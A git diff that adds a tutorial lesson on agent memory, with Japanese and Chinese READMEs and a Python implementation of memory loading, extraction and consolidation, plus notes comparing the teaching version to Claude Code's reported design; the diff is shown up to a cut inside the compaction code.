+ + diff --git a/s09_memory/README.ja.md b/s09_memory/README.ja.md new file mode 100644 index 000000000..b6b10434e --- /dev/null +++ b/s09_memory/README.ja.md @@ -0,0 +1,260 @@ +# s09: Memory — 覚えるべきは覚え、忘れるべきは忘れる + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s07 → s08 → `s09` → [s10](../s10_system_prompt/) → s11 → ... → s19 +> *"Remember what matters, forget what doesn't"* — 3つのサブシステム:フィルタ、抽出、整理。 +> +> **Harness レイヤー**: メモリ — 圧縮やセッションをまたぐ知識の蓄積。 + +--- + +## 課題 + +s08 により、Agent はコンテキストを圧縮し、長時間クラッシュせずに動作できるようになりました。しかし、圧縮は損失を伴います。 + +autoCompact は現在の目標、残りの作業、ユーザーが述べた制約をサマリに保持します — 完全な健忘ではありません。しかし、サマリは録音ではありません:「タブを使って、スペースは使わないで」という何気ない一言が、「ユーザーにはコードスタイルの好みがある」と簡略化され、詳細が失われる可能性があります。**さらに、新しいセッションを開始すると、サマリすら消えてしまいます。** + +複数回の圧縮により、累積的なドリフトも発生します — サマリのサマリ、詳細は JPEG の再圧縮のように劣化していきます。 + +**サマリに参加せず、セッションをまたいで保持される安定したメモリ層が必要 — それが memory です。** + +--- + +## ソリューション + +![Memory Overview](images/memory-overview.ja.svg) + +s08 の圧縮パイプラインは完全に維持されます。唯一の変更点:各 LLM 呼び出し前に関連メモリを注入し、autoCompact 後に会話から新しいメモリを抽出し、定期的に統合して重複を排除します。 + +3つのサブシステム、トリガータイミング順: + +| サブシステム | トリガータイミング | 動作 | +|-------------|------------------|------| +| Loading | 各 LLM 呼び出し前 | 関連メモリをフィルタ、コンテキストに注入 | +| Extraction | autoCompact 後 | 会話から好み、制約、決定を自動発見 | +| Consolidation | 定期 / アイドル時 | 重複排除、統合、古いメモリを整理 | + +メモリファイルはディスク上(`.memory/`)に永続化され、圧縮やセッションをまたいで保持されます。 + +--- + +## 仕組み + +![Memory Subsystems](images/memory-subsystems.ja.svg) + +### Loading: 関連メモリの自動読み込み + +各 LLM 呼び出し前、Agent はユーザーが以前何を言ったかを知る必要があります — 「タブを使ってスペースは使わない」「シングルクォートが好み」など。しかし、すべてのメモリをコンテキストに詰め込むと、system prompt 膨張の古い問題に戻ってしまいます。 + +現在の会話に**関連する**メモリだけをフィルタし、5件までに制限します: + +```python +def load_memories(messages: list, max_items: int = 5) -> str: + """筛选与当前对话相关的记忆。""" + memories = read_all_memory_files() + if not memories: + return "" + + recent = extract_recent_user_messages(messages, n=3) + keywords = extract_keywords(recent) + + relevant = [] + for mem in memories: + if any(keyword in 
mem["content"].lower() + for keyword in keywords): + relevant.append(mem) + if len(relevant) >= max_items: + break + + return format_memories_for_context(relevant) +``` + +キーワードマッチングは十分に正確ではありません — 「インデント」が「コードのインデントは4スペース」(ユーザーの好みの逆)にマッチする可能性があります。会話の内容を真に「理解」して新しいメモリを発見する必要があります。→ Extraction。 + +### Extraction: 新しいメモリの自動発見 + +ユーザーは毎回「これを覚えて」とは言いません。好みは自然に表れます — 「タブの方がスペースよりいいと思う」「これからはシングルクォートを使おう」など。Agent 自身が判断する必要があります:この発言に記憶すべき情報があるか? + +適切なタイミング(autoCompact 後、どうせ LLM を呼ぶので)で、Agent に最近の会話を分析させ、好み、制約、決定を抽出します: + +```python +def extract_memories(messages: list): + """从最近对话中提取值得记住的信息,直接写文件。""" + recent = get_recent_conversation(messages, n=10) + + prompt = ( + "Extract user preferences, constraints, or decisions from this dialogue.\n" + "Return a JSON array. Each item: {content, type: preference|constraint|decision}.\n" + "If nothing new, return [].\n\n" + f"{recent}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=500, + ) + for mem in parse_memory_json(response.content[0].text): + mid = f"mem_{int(time.time())}_{abs(hash(mem['content'])) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +10件、50件、200件のメモリ — 重複、矛盾、古い情報。定期的な統合が必要です。→ Consolidation。 + +### Consolidation: 定期的な整理 + +Extraction は新しいメモリを発見するたびにファイルを追加で書き込みます。2ヶ月後には `.memory/` に200個のファイルがあり — 「タブを使う」と「スペースを使う」という矛盾するメモリが共存し、Agent はどちらに従うべきか分かりません。 + +定期的に Consolidation をトリガー — LLM に重複排除、統合、古いメモリの整理を行わせます。CC はこのプロセスを **Dream**(睡眠中に脳が記憶を整理する analogy)と呼び、Agent のアイドル時にバックグラウンドで実行します: + +```python +CONSOLIDATE_THRESHOLD = 10 + +def consolidate_memories(): + """合并重复记忆,淘汰过时记忆。""" + memories = read_all_memory_files() + + if len(memories) < CONSOLIDATE_THRESHOLD: + return # 太少,不值得整理 + + prompt = ( + "Consolidate the following memories. Rules:\n" + "1. Merge duplicates into one concise memory\n" + "2. Remove outdated/contradicted memories\n" + "3. Keep the total under 50 memories\n" + "4. 
Preserve important user preferences above all\n\n" + f"{json.dumps(memories, indent=2)}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=2000, + ) + consolidated = json.loads(response.content[0].text.strip()) + # 清空旧记忆,写入合并后的 + for f in MEMORY_DIR.glob("mem_*.json"): + f.unlink() + for mem in consolidated: + mid = f"mem_{int(time.time())}_{abs(hash(mem.get('content', ''))) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +--- + +## s08 からの変更点 + +| コンポーネント | 変更前 (s08) | 変更後 (s09) | +|--------------|-------------|-------------| +| メモリ機能 | なし(圧縮サマリで好みが劣化) | Loading + Extraction + Consolidation サブシステム | +| 新規関数 | — | load_memories, extract_memories, consolidate_memories, read_all_memory_files | +| ストレージ | — | .memory/mem_*.json クロスセッション永続化 | +| ツール | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | bash, read_file, write_file (3) — メモリデモに集中 | +| ループ | 各ラウンドで圧縮のみ | 各ラウンドで関連メモリ注入 + autoCompact 後に新規メモリ抽出 + 定期的に統合 | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s09_memory/code.py +``` + +以下のプロンプトを試してください(複数ラウンドに分けて入力し、メモリの蓄積と読み込みを観察): + +1. `I prefer using tabs for indentation, not spaces. Remember that.` +2. `Create a Python file called test.py`(Agent がタブを使用するか観察) +3. `What did I tell you about my preferences?`(Agent が覚えているか観察) +4. `I also prefer single quotes over double quotes for strings.` + +観察のポイント:複数ラウンドの後、`.memory/` ディレクトリにメモリファイルが生成されているか? 新しいセッション開始時、Agent が以前のメモリを自動的に読み込んでいるか? + +--- + +## 次へ + +メモリ、ツール、圧縮が揃いました。しかし、system prompt はまだハードコードされた大きな文字列です — 「あなたは coding agent です。ツールは bash、read、write...」。 + +Agent に新しいツールを追加するには、system prompt に手動で説明を追加する必要があります。プロジェクトを変えれば、system prompt 全体を書き直す必要があります。prompt は**実行時に組み立てられる**べきです — レゴのように、異なるシナリオで異なるブロックを組み合わせる。 + +s10 System Prompt → セグメント化 + 実行時アセンブリ。異なるプロジェクト、異なるユーザー、異なるツール — 異なる prompt を組み立てる。 + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `extractMemories.ts`(615 行)、`sessionMemory.ts`(495 行)、`memoryTypes.ts`、`findRelevantMemories.ts`、`autoDream/` の完全分析に基づく。 + +### 一、MemorySelector:embedding ではなく LLM で選択 + +教育版では「CC は embedding ベクトル類似度を使う」と言っています — **これは間違いです**。CC は実際に **Sonnet 自体を使用して選択**しています(`findRelevantMemories.ts`): + +1. すべてのメモリファイルの `name` + `description`(YAML frontmatter から抽出)をカタログとしてリスト +2. カタログを Sonnet に送信:「名前と説明に基づいて、本当に有用なメモリを選択(最大5件)。不明な場合は選択しない。」 +3. Sonnet は `{ selected_memories: ["file1.md", ...] }` を返す +4. 選択されたファイルの完全な内容が読み込まれ(最大 200 行 / 4096 バイト / ファイル)、コンテキストに注入 + +つまり、メモリ選択自体が LLM 呼び出しです — ただし軽量な Sonnet side-query であり、メインフローをブロックしません。 + +### 二、ExtractMemories:stop hook でトリガー、毎ターン実行 + +トリガータイミング(`stopHooks.ts:141-152`): +- `handleStopHooks()` 内 — モデルが停止し、tool_use がないとき +- autoCompact 後では**ない**(教育版はこれを簡略化している) +- N ターンごとに実行(デフォルト N=1、つまり毎ターン) +- 重複保護あり:メイン Agent が既にメモリファイルを書き込んでいる場合はスキップ + +### 三、メモリファイル形式:JSON ではなく Markdown + YAML frontmatter + +教育版は JSON でメモリを保存します。CC は実際に **Markdown ファイル + YAML frontmatter** を使用します(`memoryTypes.ts:261-271`): + +```markdown +--- +name: user_preference_tabs +description: User prefers tabs for indentation +type: user +--- + +User prefers using tabs, not spaces, for indentation in all projects. +**Why:** Consistency with existing codebase conventions. +**How to apply:** Always use tabs when writing or editing Python files. +``` + +4つのタイプ:`user`(ユーザーの好み)、`feedback`(フィードバック指導)、`project`(プロジェクト事実)、`reference`(外部参照)。 + +メモリインデックスファイル `MEMORY.md` は1行に1リンク:`- [Title](file.md) — one-line hook`。最大 200 行 / 25KB。 + +保存場所:`~/.claude/projects//memory/` + +### 四、DreamConsolidator:三層ゲート制御 + +「アイドル時にトリガー」ではなく、三層ゲーティング(`autoDream.ts`): + +1. **時間ゲート**(最も安価):前回の統合から ≥ 24 時間経過 +2. **セッションゲート**:前回の統合以降に ≥ 5 セッションの transcript が変更された +3. 
**ロックゲート**:他のプロセスが統合を実行中ではない(`.consolidate-lock` ファイル)
+
+マージアルゴリズム自体は**さらに別の forked agent 呼び出し** — 4フェーズのプロンプト:位置特定 → 最近のシグナル収集 → 統合してファイル書き込み → 剪定してインデックス更新。ロックファイルの mtime が lastConsolidatedAt。クラッシュリカバリ:1時間後にロックが自動期限切れ、次のプロセスが引き継ぎ。
+
+### 五、Session Memory と User Memory
+
+| | User Memory | Session Memory |
+|---|---|---|
+| 永続性 | クロスセッション | 単一セッション |
+| ストレージ | `memory/` 下の複数 .md ファイル | `session-memory//memory.md` 単一ファイル |
+| 読み込み先 | system prompt | compact サマリ |
+| 用途 | クロスセッションの知識蓄積 | クロス compact のコンテキスト連続性 |
+
+sessionMemoryCompact(s08 で言及された仕組み)はまさに Session Memory を使用しています — autoCompact の前に session memory ファイルを先に読み込み、十分な内容があれば(≥ 10K トークン、≥ 5 テキストメッセージ、≤ 40K トークン)、LLM を呼ばずにそれを使ってサマリを作成します。
+
+### 教育版の簡略化は意図的
+
+- LLM 選択 → キーワードマッチング:教育版は追加の Sonnet side-query に依存できない
+- Markdown + YAML frontmatter → JSON:教育版はシンプルさのために JSON を使用
+- stop hook トリガー → autoCompact 後トリガー:概念的により一貫性がある(「圧縮と一緒にメモリを抽出」)
+- 三層ゲーティング → 単純なカウント閾値:教育版には transcript システムやマルチセッションの概念がない
+
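四節の三層ゲートは、数個のファイルシステムチェックに落とし込めます。以下は最小スケッチです(ディレクトリ構成・関数名・定数はすべて説明用の仮定であり、CC の実際のコードではありません):

```python
import time
from pathlib import Path

CONSOLIDATE_INTERVAL = 24 * 3600   # 時間ゲート:前回の統合から 24 時間以上
MIN_MODIFIED_SESSIONS = 5          # セッションゲート:5 件以上の transcript が変更された
LOCK_TTL = 3600                    # クラッシュリカバリ:1 時間を超えたロックは失効

def try_acquire_consolidation(memory_dir: Path, transcript_dir: Path) -> bool:
    """3つのゲートをコスト順に評価。True ならこのプロセスが統合してよい。"""
    lock = memory_dir / ".consolidate-lock"
    now = time.time()
    last = lock.stat().st_mtime if lock.exists() else 0.0  # mtime = lastConsolidatedAt

    # 1. 時間ゲート(最も安価):前回の統合から 24 時間未満ならスキップ
    if last and now - last < CONSOLIDATE_INTERVAL:
        return False
    # 2. セッションゲート:前回以降に十分な transcript の変更が必要
    changed = [p for p in transcript_dir.glob("*") if p.stat().st_mtime > last]
    if len(changed) < MIN_MODIFIED_SESSIONS:
        return False
    # 3. ロックゲート:LOCK_TTL より新しいロックは別プロセスが実行中の印
    if lock.exists() and now - lock.stat().st_mtime < LOCK_TTL:
        return False
    lock.touch()  # ロックを取得。mtime が今回の統合時刻を記録する
    return True
```

ロックファイルの mtime が lastConsolidatedAt を兼ねるため、クラッシュした実行が残したロックも TTL 経過後に次のプロセスが回収できます。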
+ + diff --git a/s09_memory/README.md b/s09_memory/README.md new file mode 100644 index 000000000..064ec6d75 --- /dev/null +++ b/s09_memory/README.md @@ -0,0 +1,260 @@ +# s09: Memory — 记住该记住的,忘掉该忘掉的 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s07 → s08 → `s09` → [s10](../s10_system_prompt/) → s11 → ... → s19 +> *"记住该记的, 忘掉该忘的"* — 三个子系统: 筛选、提取、整理。 +> +> **Harness 层**: 记忆 — 跨压缩、跨会话的知识积累。 + +--- + +## 问题 + +s08 让 Agent 能压缩上下文、跑很久不崩。但压缩是有损的。 + +autoCompact 会把当前目标、剩余工作、你提过的约束写进摘要保留下来——不是完全失忆。但摘要不是录音:你随口说的"用 tab 缩进不要用空格",可能被摘要简化成"用户有代码风格偏好",丢了细节。**而且新开一个会话,连摘要也没了。** + +多次压缩后还会累积漂移——摘要的摘要,细节像 JPEG 反复压缩一样退化。 + +**需要一层不参与摘要、跨会话保留的稳定记忆——这就是 memory。** + +--- + +## 解决方案 + +![Memory Overview](images/memory-overview.svg) + +s08 的压缩管线完全保留。唯一的变动:每轮 LLM 调用前注入相关记忆,autoCompact 后从对话中提取新记忆,定期整理去重。 + +三个子系统,按触发时机排列: + +| 子系统 | 触发时机 | 做什么 | +|--------|---------|--------| +| Loading | 每轮 LLM 调用前 | 筛选相关记忆,注入上下文 | +| Extraction | autoCompact 后 | 从对话中自动发现偏好、约束、决策 | +| Consolidation | 定期 / 空闲时 | 去重、合并、淘汰过时记忆 | + +记忆文件持久化在磁盘上(`.memory/`),跨压缩、跨会话。 + +--- + +## 工作原理 + +![Memory Subsystems](images/memory-subsystems.svg) + +### Loading: 自动加载相关记忆 + +每轮 LLM 调用前,Agent 需要知道用户之前说过什么——"用 tab 不用空格"、"偏好单引号"。但如果把全部记忆塞进上下文,等于回到了 system prompt 膨胀的老路。 + +只筛选与当前对话**相关的**记忆,控制在 5 条以内: + +```python +def load_memories(messages: list, max_items: int = 5) -> str: + """筛选与当前对话相关的记忆。""" + memories = read_all_memory_files() + if not memories: + return "" + + recent = extract_recent_user_messages(messages, n=3) + keywords = extract_keywords(recent) + + relevant = [] + for mem in memories: + if any(keyword in mem["content"].lower() + for keyword in keywords): + relevant.append(mem) + if len(relevant) >= max_items: + break + + return format_memories_for_context(relevant) +``` + +关键词匹配不够精确——"缩进"可能匹配到"代码缩进是 4 空格"(用户偏好的反面)。需要真的"理解"对话内容才能发现新记忆。→ Extraction。 + +### Extraction: 自动发现新记忆 + +用户不会每次都说"记住这个"。偏好是自然流露的——"我觉得 tab 比空格好"、"以后都用单引号吧"。Agent 需要自己判断:这句话里有没有值得记下来的信息? 
+ +在合适的时机(autoCompact 之后,反正要调 LLM),让 Agent 分析最近对话,提取偏好、约束、决策: + +```python +def extract_memories(messages: list): + """从最近对话中提取值得记住的信息,直接写文件。""" + recent = get_recent_conversation(messages, n=10) + + prompt = ( + "Extract user preferences, constraints, or decisions from this dialogue.\n" + "Return a JSON array. Each item: {content, type: preference|constraint|decision}.\n" + "If nothing new, return [].\n\n" + f"{recent}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=500, + ) + for mem in parse_memory_json(response.content[0].text): + mid = f"mem_{int(time.time())}_{abs(hash(mem['content'])) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +记忆 10 条、50 条、200 条——重复的、矛盾的、过时的。需要定期整理。→ Consolidation。 + +### Consolidation: 定期整理 + +Extraction 每次发现新记忆就追加写文件。两个月后 `.memory/` 下有 200 个文件——"用 tab"和"用空格"两个矛盾的记忆同时存在,Agent 不知道该听哪个。 + +定期触发 Consolidation——让 LLM 去重、合并、淘汰过时记忆。CC 把这个过程叫 **Dream**(借喻睡眠时大脑整理记忆),在 Agent 空闲时后台运行: + +```python +CONSOLIDATE_THRESHOLD = 10 + +def consolidate_memories(): + """合并重复记忆,淘汰过时记忆。""" + memories = read_all_memory_files() + + if len(memories) < CONSOLIDATE_THRESHOLD: + return # 太少,不值得整理 + + prompt = ( + "Consolidate the following memories. Rules:\n" + "1. Merge duplicates into one concise memory\n" + "2. Remove outdated/contradicted memories\n" + "3. Keep the total under 50 memories\n" + "4. 
Preserve important user preferences above all\n\n" + f"{json.dumps(memories, indent=2)}" + ) + + response = client.messages.create( + model=MODEL, + messages=[{"role": "user", "content": prompt}], + max_tokens=2000, + ) + consolidated = json.loads(response.content[0].text.strip()) + # 清空旧记忆,写入合并后的 + for f in MEMORY_DIR.glob("mem_*.json"): + f.unlink() + for mem in consolidated: + mid = f"mem_{int(time.time())}_{abs(hash(mem.get('content', ''))) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) +``` + +--- + +## 相对 s08 的变更 + +| 组件 | 之前 (s08) | 之后 (s09) | +|------|-----------|-----------| +| 记忆能力 | 无(压缩后偏好随摘要退化) | Loading + Extraction + Consolidation 三子系统 | +| 新函数 | — | load_memories, extract_memories, consolidate_memories, read_all_memory_files | +| 存储 | — | .memory/mem_*.json 跨会话持久化 | +| 工具 | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | bash, read_file, write_file (3) — 专注记忆演示 | +| 循环 | 每轮只做压缩 | 每轮注入相关记忆 + autoCompact 后提取新记忆 + 定期整理 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s09_memory/code.py +``` + +试试这些 prompt(分多轮输入,观察记忆的累积和加载): + +1. `I prefer using tabs for indentation, not spaces. Remember that.` +2. `Create a Python file called test.py`(观察 Agent 是否用了 tab) +3. `What did I tell you about my preferences?`(观察 Agent 是否记得) +4. `I also prefer single quotes over double quotes for strings.` + +观察重点:多轮对话后 `.memory/` 目录下是否生成了记忆文件?新一轮对话时 Agent 是否自动加载了之前的记忆? + +--- + +## 接下来 + +现在记忆有了、工具有了、压缩有了。但 system prompt 还是硬编码的一大段字符串——"你是一个 coding agent,你的工具是 bash、read、write..."。 + +如果给 Agent 加了一个新工具,system prompt 里要手动加一段描述。换了一个项目,整个 system prompt 要重写。prompt 应该是**运行时组装的**,像乐高——不同场景拼不同的积木。 + +s10 System Prompt → 分段 + 运行时组装。不同项目、不同用户、不同工具——拼出不同的 prompt。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `extractMemories.ts`(615 行)、`sessionMemory.ts`(495 行)、`memoryTypes.ts`、`findRelevantMemories.ts`、`autoDream/` 的完整分析。 + +### 一、MemorySelector:是用 LLM 选,不是 embedding + +教学版说"CC 用 embedding 向量相似度"——**这是错的**。CC 实际是用 **Sonnet 本身来选**(`findRelevantMemories.ts`): + +1. 把所有记忆文件的 `name` + `description`(从 YAML frontmatter 提取)列成清单 +2. 把清单发给 Sonnet:"根据名称和描述,选出真正有用的记忆(最多 5 个)。不确定就不要选。" +3. Sonnet 返回 `{ selected_memories: ["file1.md", ...] }` +4. 选中文件的完整内容被读取(最多 200 行 / 4096 字节每文件),注入到上下文 + +这意味着记忆选择本身就是一次 LLM 调用——但用的是轻量级 Sonnet side-query,不阻塞主流程。 + +### 二、ExtractMemories:在 stop hook 中触发,每轮都跑 + +触发时机(`stopHooks.ts:141-152`): +- 在 `handleStopHooks()` 中——模型停止、没有 tool_use 时 +- **不是** autoCompact 之后(教学版简化了这一点) +- 每 N 轮跑一次(默认 N=1,即每轮都跑) +- 有重叠保护:如果主 Agent 已经写入了记忆文件,跳过 + +### 三、记忆文件格式:Markdown + YAML frontmatter,不是 JSON + +教学版用 JSON 存储记忆。CC 实际用 **Markdown 文件 + YAML frontmatter**(`memoryTypes.ts:261-271`): + +```markdown +--- +name: user_preference_tabs +description: User prefers tabs for indentation +type: user +--- + +User prefers using tabs, not spaces, for indentation in all projects. +**Why:** Consistency with existing codebase conventions. +**How to apply:** Always use tabs when writing or editing Python files. +``` + +四种类型:`user`(用户偏好)、`feedback`(反馈指导)、`project`(项目事实)、`reference`(外部参考)。 + +记忆索引文件 `MEMORY.md` 是一行一个链接:`- [Title](file.md) — one-line hook`。最多 200 行 / 25KB。 + +存储位置:`~/.claude/projects//memory/` + +### 四、DreamConsolidator:三层门控 + +不是"空闲时触发",而是三层门控(`autoDream.ts`): + +1. **时间门禁**(最便宜):距上次合并 ≥ 24 小时 +2. **会话门禁**:自上次合并以来修改了 ≥ 5 个会话 transcript +3. 
**锁门禁**:没有其他进程正在做合并(`.consolidate-lock` 文件)
+
+合并算法本身是**又一个 forked agent 调用**——四阶段 prompt:定位 → 收集近期信号 → 合并写文件 → 剪枝更新索引。锁文件 mtime 就是 lastConsolidatedAt。崩溃恢复:1 小时后锁自动过期,下一个进程回收。
+
+### 五、Session Memory vs User Memory
+
+| | User Memory | Session Memory |
+|---|---|---|
+| 持久性 | 跨会话 | 单会话 |
+| 存储 | `memory/` 下多个 .md 文件 | `session-memory//memory.md` 单文件 |
+| 加载到 | system prompt | compact 摘要 |
+| 用途 | 跨会话的知识积累 | 跨 compact 的上下文连续性 |
+
+sessionMemoryCompact(s08 中提过的机制)正是使用了 Session Memory——autoCompact 前先读 session memory 文件,如果有足够内容(≥ 10K token、≥ 5 条文本消息、≤ 40K token),就用它做摘要,不调 LLM。
+
+### 教学版的简化是刻意的
+
+- LLM 选记忆 → 关键词匹配:教学版不能依赖额外的 Sonnet side-query
+- Markdown + YAML frontmatter → JSON:教学版用 JSON 更简单
+- stop hook 触发 → autoCompact 后触发:概念更连贯("压缩后顺便提取记忆")
+- 三层门控 → 简单的计数判断:教学版没有 transcript 系统和多会话概念
+
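第四节的三层门控可以落成几个文件系统检查。下面是一个最小示意(目录结构、函数名、常量均为示意性假设,并非 CC 的真实代码):

```python
import time
from pathlib import Path

CONSOLIDATE_INTERVAL = 24 * 3600   # 时间门禁:距上次合并 >= 24 小时
MIN_MODIFIED_SESSIONS = 5          # 会话门禁:>= 5 个 transcript 被修改过
LOCK_TTL = 3600                    # 崩溃恢复:超过 1 小时的锁视为过期

def try_acquire_consolidation(memory_dir: Path, transcript_dir: Path) -> bool:
    """按成本顺序评估三层门禁;返回 True 表示本进程可以开始合并。"""
    lock = memory_dir / ".consolidate-lock"
    now = time.time()
    last = lock.stat().st_mtime if lock.exists() else 0.0  # mtime 即 lastConsolidatedAt

    # 1. 时间门禁(最便宜):距上次合并不足 24 小时则跳过
    if last and now - last < CONSOLIDATE_INTERVAL:
        return False
    # 2. 会话门禁:上次合并以来需要有足够多的 transcript 变动
    changed = [p for p in transcript_dir.glob("*") if p.stat().st_mtime > last]
    if len(changed) < MIN_MODIFIED_SESSIONS:
        return False
    # 3. 锁门禁:锁比 LOCK_TTL 新,说明另一个进程正在合并
    if lock.exists() and now - lock.stat().st_mtime < LOCK_TTL:
        return False
    lock.touch()  # 占锁;它的 mtime 同时记录本次合并时间
    return True
```

因为锁文件的 mtime 兼任 lastConsolidatedAt,进程崩溃留下的锁在 TTL 过期后,自然会被下一个进程回收。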
+ + diff --git a/s09_memory/code.py b/s09_memory/code.py new file mode 100644 index 000000000..dda7f76d3 --- /dev/null +++ b/s09_memory/code.py @@ -0,0 +1,296 @@ +#!/usr/bin/env python3 +""" +s09_memory.py - Memory System + +Three subsystems for persistent, cross-session knowledge: + + Loading: filter relevant memories → inject into context (every turn) + Extraction: discover preferences/constraints from dialogue (after compact) + Consolidation: merge duplicates, prune stale memories (periodic) + + ┌──────────────────────────────────────────────────────────────────┐ + │ .memory/ (persistent, survives compact and session restart) │ + │ mem_*.json ←── Extraction writes ──→ Consolidation merges │ + │ ↑ │ + │ Loading reads (keyword filter, max 5 items, ≤2000 token) │ + └──────────────────────────────────────────────────────────────────┘ + + In agent_loop: + system = SYSTEM + load_memories(messages) # every turn + ... + compact_history(messages) + extract_memories(messages) # after compact + consolidate_memories() # if ≥ 10 files + +Builds on s08 (context compact). Usage: + + python s09_memory/code.py + Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess, json, time +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +MEMORY_DIR = WORKDIR / ".memory"; MEMORY_DIR.mkdir(exist_ok=True) +SKILLS_DIR = WORKDIR / "skills" +TRANSCRIPT_DIR = WORKDIR / ".transcripts" +TOOL_RESULTS_DIR = WORKDIR / ".task_outputs" / "tool-results" +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. Relevant memories are injected below. Respect user preferences from memory." 
+ +# ═══════════════════════════════════════════════════════════ +# FROM s02-s08 (unchanged): Basic tools +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(cmd: str) -> str: + try: + r = subprocess.run(cmd, shell=True, cwd=WORKDIR, capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path); file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content); return f"Wrote {len(content)} bytes to {path}" + except Exception as e: return f"Error: {e}" + + +# ═══════════════════════════════════════════════════════════ +# NEW in s09: Memory System — Loading + Extraction +# ═══════════════════════════════════════════════════════════ + +def extract_keywords(text: str) -> list[str]: + return [w.lower() for w in text.split() if len(w) > 3] + +def extract_recent_user_messages(messages: list, n: int = 3) -> str: + texts = [] + for msg in reversed(messages): + if msg.get("role") == "user" and isinstance(msg.get("content"), str): + texts.append(msg["content"]) + if len(texts) >= n: break + return " ".join(reversed(texts)) + +def read_all_memory_files() -> list[dict]: + memories = [] + for f in sorted(MEMORY_DIR.glob("mem_*.json")): + try: memories.append(json.loads(f.read_text())) + except Exception: pass + return memories + +# Loading: filter relevant 
memories each turn +def load_memories(messages: list, max_items: int = 5) -> str: + memories = read_all_memory_files() + if not memories: return "" + recent = extract_recent_user_messages(messages) + keywords = extract_keywords(recent) + relevant = [] + for mem in memories: + if any(kw in mem.get("content", "").lower() for kw in keywords): + relevant.append(mem) + if len(relevant) >= max_items: break + if not relevant: return "" + lines = [""] + for m in relevant: lines.append(f"- [{m.get('type', 'general')}] {m['content']}") + lines.append("") + return "\n".join(lines) + +# Extraction: discover new memories from dialogue (writes files directly) +def extract_memories(messages: list): + dialogue = "" + for msg in messages[-10:]: + role = msg.get("role", "?") + content = msg.get("content", "") + if isinstance(content, list): + content = " ".join(str(getattr(b, "text", "")) for b in content if getattr(b, "type", None) == "text") + dialogue += f"{role}: {content}\n" + prompt = ("Extract user preferences, constraints, or decisions from this dialogue.\n" + "Return a JSON array. Each item: {content, type: preference|constraint|decision}.\n" + "If nothing new, return [].\n\n" + dialogue[:4000]) + try: + response = client.messages.create(model=MODEL, messages=[{"role": "user", "content": prompt}], max_tokens=500) + text = response.content[0].text.strip() + if text.startswith("["): + for mem in json.loads(text): + mid = f"mem_{int(time.time())}_{abs(hash(mem['content'])) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) + print(f"\n\033[33m[Memory: extracted {len(json.loads(text))} new memories]\033[0m") + except Exception: pass + +# Consolidation: merge duplicates, prune stale memories (triggered when ≥ 10 files) +CONSOLIDATE_THRESHOLD = 10 + +def consolidate_memories(): + memories = read_all_memory_files() + if len(memories) < CONSOLIDATE_THRESHOLD: + return + prompt = ("Consolidate the following memories. Rules:\n" + "1. 
Merge duplicates into one concise memory\n" + "2. Remove outdated/contradicted memories\n" + "3. Keep the total under 50 memories\n" + "4. Preserve important user preferences above all\n\n" + f"{json.dumps(memories, indent=2)}") + try: + response = client.messages.create( + model=MODEL, messages=[{"role": "user", "content": prompt}], max_tokens=2000) + consolidated = json.loads(response.content[0].text.strip()) + # Clear old memories, write consolidated + for f in MEMORY_DIR.glob("mem_*.json"): + f.unlink() + for mem in consolidated: + mid = f"mem_{int(time.time())}_{abs(hash(mem.get('content', ''))) % 10000}" + (MEMORY_DIR / f"{mid}.json").write_text(json.dumps(mem, indent=2)) + print(f"\n\033[33m[Memory: consolidated {len(memories)} → {len(consolidated)} memories]\033[0m") + except Exception: pass + + +# ═══════════════════════════════════════════════════════════ +# FROM s08 (unchanged): Compaction pipeline + tool definitions +# ═══════════════════════════════════════════════════════════ + +CONTEXT_LIMIT = 50000; KEEP_RECENT = 3; PERSIST_THRESHOLD = 30000 + +def estimate_size(msgs): return len(str(msgs)) +def snip_compact(msgs, mx=50): + if len(msgs) <= mx: return msgs + return msgs[:3] + [{"role": "user", "content": f"[snipped {len(msgs)-mx} msgs]"}] + msgs[-(mx-3):] +def collect_tool_results(msgs): + blocks = [] + for mi, msg in enumerate(msgs): + if msg.get("role") != "user" or not isinstance(msg.get("content"), list): continue + for bi, block in enumerate(msg["content"]): + if isinstance(block, dict) and block.get("type") == "tool_result": blocks.append((mi, bi, block)) + return blocks +def micro_compact(msgs): + 